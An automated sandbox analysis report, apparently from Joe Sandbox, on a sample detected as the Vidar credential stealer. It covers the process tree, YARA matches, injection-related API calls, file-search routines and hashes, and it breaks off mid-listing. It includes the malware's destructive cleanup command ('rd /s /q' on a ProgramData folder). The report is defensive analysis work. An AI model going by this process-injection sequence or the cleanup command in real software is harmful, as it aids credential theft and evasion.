2024-09-21 16:52:17 UTC	776	IN	HTTP/1.1 200 OK Date: Sat, 21 Sep 2024 16:52:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=lujg5p7c6c7oa7i8icbe1fe3f1; expires=Wed, 15 Jan 2025 10:38:56 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Js%2B6Z5KRrNb%2BjNjI4%2FH4RDQJvX47Le49e6tZldG7AjoI5QimaxB7m56jQzerxe%2FgdSRNpcdHZGrdRcQ6dd8L%2F4GyEgMzLxiZRzDmdKTHype0Z23HkBkQkh2qxH2S7mEfvC5WB%2Baq"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c6b90952fd67ce2-EWR
2024-09-21 16:52:17 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-21 16:52:17 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	12:51:02
Start date:	21/09/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0xa0000
File size:	423'328 bytes
MD5 hash:	4AE2D1685D2732CFCD128560424C53CC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1722743408.00000000035B5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.1722743408.00000000035B5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	12:51:02
Start date:	21/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	12:51:03
Start date:	21/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x4a0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	12:51:03
Start date:	21/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xee0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	12:52:08
Start date:	21/09/2024
Path:	C:\ProgramData\BKKKEGIDBG.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\BKKKEGIDBG.exe"
Imagebase:	0xfc0000
File size:	390'560 bytes
MD5 hash:	F5A1956973DCE107D4C0B6267CE88870
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	12:52:08
Start date:	21/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	12:52:09
Start date:	21/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x10000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	12:52:14
Start date:	21/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\CAEHCFCBKKJD" & exit
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	12:52:14
Start date:	21/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	12:52:14
Start date:	21/09/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 10
Imagebase:	0x510000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	12:52:16
Start date:	21/09/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5224 -s 1776
Imagebase:	0x1000000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	12:52:29
Start date:	21/09/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5224 -s 1788
Imagebase:	0x1000000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	32%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	18.2%
Total number of Nodes:	44
Total number of Limit Nodes:	1

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 025B212D Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 282
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 025B229C
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 025B22AF
Wow64GetThreadContext.KERNEL32(?,00000000), ref: 025B22CD
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 025B22F1
VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 025B231C
TerminateProcess.KERNELBASE(?,00000000), ref: 025B233B
WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?), ref: 025B2374
WriteProcessMemory.KERNELBASE(?,?,?,?,00000000,?,00000028), ref: 025B23BF
WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 025B23FD
Wow64SetThreadContext.KERNEL32(?,?), ref: 025B2439
ResumeThread.KERNELBASE(?), ref: 025B2448

Strings

GetP, xrefs: 025B21AF
Load, xrefs: 025B216B
ress, xrefs: 025B21B7
aryA, xrefs: 025B2173

Memory Dump Source

Source File: 00000000.00000002.1720983596.00000000025B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_25b1000_file.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
String ID: GetP$Load$aryA$ress
API String ID: 2440066154-977067982
Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction ID: 99daedf4651f83425c2798bbf0ae5425a2253dea8fc3f3f314bb49432da08efe
Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction Fuzzy Hash: A0B1E67664024AAFDB60CF68CC80BDA77A5FF88714F158524EA0CEB341D774FA418BA4

Function 00AD0BEF Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 294
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(035B3590,?,?,?,?,?,?,?,?,00000000,00000000,?,00AD0A78,00000001,00000040), ref: 00AD0FF9

Strings

&S!, xrefs: 00AD0C87
<1i;, xrefs: 00AD0DEC

Memory Dump Source

Source File: 00000000.00000002.1720732326.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_file.jbxd

Similarity

API ID: ProtectVirtual
String ID: &S!$<1i;
API String ID: 544645111-1770337207
Opcode ID: 09ed968b7528a55e62a036f4794574593e0d0e1aead045fc7913cf8db9ff9dba
Instruction ID: e7b4e9c70cc789344ef4e68b32bf9829d32c61fc86fd46a9d344e92e9be81af7
Opcode Fuzzy Hash: 09ed968b7528a55e62a036f4794574593e0d0e1aead045fc7913cf8db9ff9dba
Instruction Fuzzy Hash: 31C18D70A042599FCB11CFA9C980AEDFBF2FF48314F64859AE459AB345D730AD41CBA4

Function 00AD1032 Relevance: 1.6, APIs: 1, Instructions: 69
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(00000000,00000000,?,00000000,?,?,?,?,?,00000000,00000000,?,00AD0AA8,?,00000000,?), ref: 00AD10D1

Memory Dump Source

Source File: 00000000.00000002.1720732326.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_file.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 4fe4f38a5d6671ef5899c39787f67c30bd8f748f7b13f329a79357f98ae448a1
Instruction ID: e7976ea7a1a6cbf8ee5ab1bdf9e59283abf1ec6a9b1584f5f3487d89bf412778
Opcode Fuzzy Hash: 4fe4f38a5d6671ef5899c39787f67c30bd8f748f7b13f329a79357f98ae448a1
Instruction Fuzzy Hash: 4221F5B59012499FCB10CF9AD984ADEBBF4FF48310F10842AE859A7350D775A944CFA4

Function 00AD051C Relevance: 1.6, APIs: 1, Instructions: 68
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(00000000,00000000,?,00000000,?,?,?,?,?,00000000,00000000,?,00AD0AA8,?,00000000,?), ref: 00AD10D1

Memory Dump Source

Source File: 00000000.00000002.1720732326.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_file.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: e435216566a642b2073657133fbc80f3fb4e4216e9dccecc2849cc28388a8c12
Instruction ID: 78e7e74b65a0ff75ddde635307706e0c38b000f27a6c7c642cad17b6866b8469
Opcode Fuzzy Hash: e435216566a642b2073657133fbc80f3fb4e4216e9dccecc2849cc28388a8c12
Instruction Fuzzy Hash: 782115B5901349EFCB10DF9AD984ADEBBF4FB48310F20842AE819A7340D375A944CFA4

Function 00AD0510 Relevance: 1.6, APIs: 1, Instructions: 54
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(035B3590,?,?,?,?,?,?,?,?,00000000,00000000,?,00AD0A78,00000001,00000040), ref: 00AD0FF9

Memory Dump Source

Source File: 00000000.00000002.1720732326.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_file.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: fe5fdca42ce0d9cd9e0976de358d8872bd892e201c9eb31a19801ecd42e66581
Instruction ID: 0c552ad5031a3e62f5f7b2c145f02eae666f573a26a0c75d043d3382928a38bf
Opcode Fuzzy Hash: fe5fdca42ce0d9cd9e0976de358d8872bd892e201c9eb31a19801ecd42e66581
Instruction Fuzzy Hash: 1C21CEB5901259AFCB10DF9AD884ADEFBB4FB49314F50812AE918A7300D3B4A954CFE5

Function 009ED032 Relevance: .1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1720529581.00000000009ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 009ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9ed000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2688f96cc50c61809f1fc9d99b6fccdf505227c3367fd71a1c1e707d743fe10e
Instruction ID: 04c0ec8a3d33653ace6e85e326e9a6a9edf18e884c3088203d2456f834f52557
Opcode Fuzzy Hash: 2688f96cc50c61809f1fc9d99b6fccdf505227c3367fd71a1c1e707d743fe10e
Instruction Fuzzy Hash: EC11A36154E3C09ED7138B269CA4761BFB8DF53225F0D84CBD8888F1A7C2699C49C772

Function 009ED059 Relevance: .0, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1720529581.00000000009ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 009ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9ed000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d13348b9056b6f56262584abfa50a4d6b049adb8591fba4b26d9506db500a90
Instruction ID: 8af2ca96c134f858f2dcabc25ce91295dc5de152c848125868c571bf1438d2c9
Opcode Fuzzy Hash: 2d13348b9056b6f56262584abfa50a4d6b049adb8591fba4b26d9506db500a90
Instruction Fuzzy Hash: D5012B7110A3809AE7129B27DD84767BF9CDF45322F1CC92AEC080E286C279DC41C671

Analysis Process: RegAsm.exePID: 7520, Parent PID: 7420COMMON

Execution Graph

Execution Coverage:	5.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.6%
Total number of Nodes:	2000
Total number of Limit Nodes:	17

Executed Functions

Function 0041891A Relevance: 231.5, APIs: 121, Strings: 11, Instructions: 518
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(74DD0000,00417293), ref: 0041892E
GetProcAddress.KERNEL32 ref: 00418945
GetProcAddress.KERNEL32 ref: 0041895C
GetProcAddress.KERNEL32 ref: 00418973
GetProcAddress.KERNEL32 ref: 0041898A
GetProcAddress.KERNEL32 ref: 004189A1
GetProcAddress.KERNEL32 ref: 004189B8
GetProcAddress.KERNEL32 ref: 004189CF
GetProcAddress.KERNEL32 ref: 004189E6
GetProcAddress.KERNEL32 ref: 004189FD
GetProcAddress.KERNEL32 ref: 00418A14
GetProcAddress.KERNEL32 ref: 00418A2B
GetProcAddress.KERNEL32 ref: 00418A42
GetProcAddress.KERNEL32 ref: 00418A59
GetProcAddress.KERNEL32 ref: 00418A70
GetProcAddress.KERNEL32 ref: 00418A87
GetProcAddress.KERNEL32 ref: 00418A9E
GetProcAddress.KERNEL32 ref: 00418AB5
GetProcAddress.KERNEL32 ref: 00418ACC
GetProcAddress.KERNEL32 ref: 00418AE3
GetProcAddress.KERNEL32 ref: 00418AFA
GetProcAddress.KERNEL32 ref: 00418B11
GetProcAddress.KERNEL32 ref: 00418B28
GetProcAddress.KERNEL32 ref: 00418B3F
GetProcAddress.KERNEL32 ref: 00418B56
GetProcAddress.KERNEL32 ref: 00418B6D
GetProcAddress.KERNEL32 ref: 00418B84
GetProcAddress.KERNEL32 ref: 00418B9B
GetProcAddress.KERNEL32 ref: 00418BB2
GetProcAddress.KERNEL32 ref: 00418BC9
GetProcAddress.KERNEL32 ref: 00418BE0
GetProcAddress.KERNEL32 ref: 00418BF7
GetProcAddress.KERNEL32 ref: 00418C0E
GetProcAddress.KERNEL32 ref: 00418C25
GetProcAddress.KERNEL32 ref: 00418C3C
GetProcAddress.KERNEL32 ref: 00418C53
GetProcAddress.KERNEL32 ref: 00418C6A
GetProcAddress.KERNEL32 ref: 00418C81
GetProcAddress.KERNEL32 ref: 00418C98
GetProcAddress.KERNEL32 ref: 00418CAF
GetProcAddress.KERNEL32 ref: 00418CC6
GetProcAddress.KERNEL32 ref: 00418CDD
GetProcAddress.KERNEL32 ref: 00418CF4
GetProcAddress.KERNEL32(CreateProcessA), ref: 00418D0A
GetProcAddress.KERNEL32(GetThreadContext), ref: 00418D20
GetProcAddress.KERNEL32(ReadProcessMemory), ref: 00418D36
GetProcAddress.KERNEL32(VirtualAllocEx), ref: 00418D4C
GetProcAddress.KERNEL32(ResumeThread), ref: 00418D62
GetProcAddress.KERNEL32(WriteProcessMemory), ref: 00418D78
GetProcAddress.KERNEL32(SetThreadContext), ref: 00418D8E
LoadLibraryA.KERNEL32(00417293), ref: 00418D9F
LoadLibraryA.KERNEL32 ref: 00418DB0
LoadLibraryA.KERNEL32 ref: 00418DC1
LoadLibraryA.KERNEL32 ref: 00418DD2
LoadLibraryA.KERNEL32 ref: 00418DE3
LoadLibraryA.KERNEL32 ref: 00418DF4
LoadLibraryA.KERNEL32 ref: 00418E05
LoadLibraryA.KERNEL32 ref: 00418E16
LoadLibraryA.KERNEL32(dbghelp.dll), ref: 00418E26
GetProcAddress.KERNEL32(75290000), ref: 00418E41
GetProcAddress.KERNEL32 ref: 00418E58
GetProcAddress.KERNEL32 ref: 00418E6F
GetProcAddress.KERNEL32 ref: 00418E86
GetProcAddress.KERNEL32 ref: 00418E9D
GetProcAddress.KERNEL32(734C0000), ref: 00418EBC
GetProcAddress.KERNEL32 ref: 00418ED3
GetProcAddress.KERNEL32 ref: 00418EEA
GetProcAddress.KERNEL32 ref: 00418F01
GetProcAddress.KERNEL32 ref: 00418F18
GetProcAddress.KERNEL32 ref: 00418F2F
GetProcAddress.KERNEL32 ref: 00418F46
GetProcAddress.KERNEL32 ref: 00418F5D
GetProcAddress.KERNEL32(752C0000), ref: 00418F78
GetProcAddress.KERNEL32 ref: 00418F8F
GetProcAddress.KERNEL32 ref: 00418FA6
GetProcAddress.KERNEL32 ref: 00418FBD
GetProcAddress.KERNEL32 ref: 00418FD4
GetProcAddress.KERNEL32(74EC0000), ref: 00418FF3
GetProcAddress.KERNEL32 ref: 0041900A
GetProcAddress.KERNEL32 ref: 00419021
GetProcAddress.KERNEL32 ref: 00419038
GetProcAddress.KERNEL32 ref: 0041904F
GetProcAddress.KERNEL32 ref: 00419066
GetProcAddress.KERNEL32(75BD0000), ref: 00419085
GetProcAddress.KERNEL32 ref: 0041909C
GetProcAddress.KERNEL32 ref: 004190B3
GetProcAddress.KERNEL32 ref: 004190CA
GetProcAddress.KERNEL32 ref: 004190E1
GetProcAddress.KERNEL32 ref: 004190F8
GetProcAddress.KERNEL32 ref: 0041910F
GetProcAddress.KERNEL32 ref: 00419126
GetProcAddress.KERNEL32 ref: 0041913D
GetProcAddress.KERNEL32(75A70000), ref: 00419158
GetProcAddress.KERNEL32 ref: 0041916F
GetProcAddress.KERNEL32 ref: 00419186
GetProcAddress.KERNEL32 ref: 0041919D
GetProcAddress.KERNEL32 ref: 004191B4
GetProcAddress.KERNEL32(75450000), ref: 004191CF
GetProcAddress.KERNEL32 ref: 004191E6
GetProcAddress.KERNEL32(75DA0000), ref: 00419201
GetProcAddress.KERNEL32 ref: 00419218
GetProcAddress.KERNEL32(6F090000), ref: 00419237
GetProcAddress.KERNEL32 ref: 0041924E
GetProcAddress.KERNEL32 ref: 00419265
GetProcAddress.KERNEL32 ref: 0041927C
GetProcAddress.KERNEL32 ref: 00419293
GetProcAddress.KERNEL32 ref: 004192AA
GetProcAddress.KERNEL32 ref: 004192C1
GetProcAddress.KERNEL32 ref: 004192D8
GetProcAddress.KERNEL32(HttpQueryInfoA), ref: 004192EE
GetProcAddress.KERNEL32(InternetSetOptionA), ref: 00419304
GetProcAddress.KERNEL32(75AF0000), ref: 0041931F
GetProcAddress.KERNEL32 ref: 00419336
GetProcAddress.KERNEL32 ref: 0041934D
GetProcAddress.KERNEL32 ref: 00419364
GetProcAddress.KERNEL32(75D90000), ref: 0041937F
GetProcAddress.KERNEL32(6C560000), ref: 0041939A
GetProcAddress.KERNEL32 ref: 004193B1
GetProcAddress.KERNEL32 ref: 004193C8
GetProcAddress.KERNEL32 ref: 004193DF
GetProcAddress.KERNEL32(6C370000,SymMatchString), ref: 004193F9

Strings

dbghelp.dll, xrefs: 00418E1C
HttpQueryInfoA, xrefs: 004192DE
VirtualAllocEx, xrefs: 00418D3C
CreateProcessA, xrefs: 00418CFA
InternetSetOptionA, xrefs: 004192F4
WriteProcessMemory, xrefs: 00418D68
ReadProcessMemory, xrefs: 00418D26
SetThreadContext, xrefs: 00418D7E
ResumeThread, xrefs: 00418D52
GetThreadContext, xrefs: 00418D10
SymMatchString, xrefs: 004193F3

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: CreateProcessA$GetThreadContext$HttpQueryInfoA$InternetSetOptionA$ReadProcessMemory$ResumeThread$SetThreadContext$SymMatchString$VirtualAllocEx$WriteProcessMemory$dbghelp.dll
API String ID: 2238633743-2740034357
Opcode ID: 3e30b89850b8473fc7cede02b6692b6796462800fa081e8782096f790b2d890e
Instruction ID: 95a493081ce71f04d2f0428309abc9be209c5feeaecb412fec18ff8b9e74bbfe
Opcode Fuzzy Hash: 3e30b89850b8473fc7cede02b6692b6796462800fa081e8782096f790b2d890e
Instruction Fuzzy Hash: 9652F475910312AFEF1ADFA0FD088243BA7F718707F11A466E91582270E73B4A64EF19

Function 00414C91 Relevance: 44.0, APIs: 21, Strings: 4, Instructions: 297
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00414CE5
FindFirstFileA.KERNEL32(?,?), ref: 00414CFC
_memset.LIBCMT ref: 00414D18
_memset.LIBCMT ref: 00414D29
StrCmpCA.SHLWAPI(?,004369F0), ref: 00414D4A
StrCmpCA.SHLWAPI(?,004369F4), ref: 00414D64
wsprintfA.USER32 ref: 00414D8B
StrCmpCA.SHLWAPI(?,0043660F), ref: 00414D9F
wsprintfA.USER32 ref: 00414DC8
wsprintfA.USER32 ref: 00414DDF

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175B2,004366D6), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00417083,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 004105BD

Part of subcall function 00412166: CreateFileA.KERNEL32(uOA,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,00414F75,?), ref: 00412181

_memset.LIBCMT ref: 00414DF1
lstrcatA.KERNEL32(?,?), ref: 00414E06
strtok_s.MSVCRT ref: 00414E4B
_memset.LIBCMT ref: 00414E5D
lstrcatA.KERNEL32(?,?), ref: 00414E72
strtok_s.MSVCRT ref: 00414E8B
PathMatchSpecA.SHLWAPI(?,00000000), ref: 00414EA0
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00414F7F
strtok_s.MSVCRT ref: 00414FB0
FindNextFileA.KERNELBASE(?,?), ref: 004150CE
FindClose.KERNEL32(?), ref: 004150EE

Strings

%s\%s, xrefs: 00414DD9
%s\%s\%s, xrefs: 00414DC2
%s\*.*, xrefs: 00414CD9
%s\%s, xrefs: 00414D85

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _memsetlstrcatwsprintf$FileFindlstrcpystrtok_s$CloseCreateFirstMatchNextPathSpecUnothrow_t@std@@@__ehfuncinfo$??2@lstrlen
String ID: %s\%s$%s\%s$%s\%s\%s$%s\*.*
API String ID: 2867719434-332874205
Opcode ID: 1e05084771a7a011ec97cefbe05180adb691ff6ea96afb9f06b101a98381b6a6
Instruction ID: 1d49a35e0c6b55f1981c12fb275230eec6249b52552b7fdd8fd355505706a1aa
Opcode Fuzzy Hash: 1e05084771a7a011ec97cefbe05180adb691ff6ea96afb9f06b101a98381b6a6
Instruction Fuzzy Hash: A8C129B1E0021AABCF21EF65DC45AEE777DAF08305F0140A6FA09A3151DA399F858F59

Function 0040884C Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 405
memoryfilestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

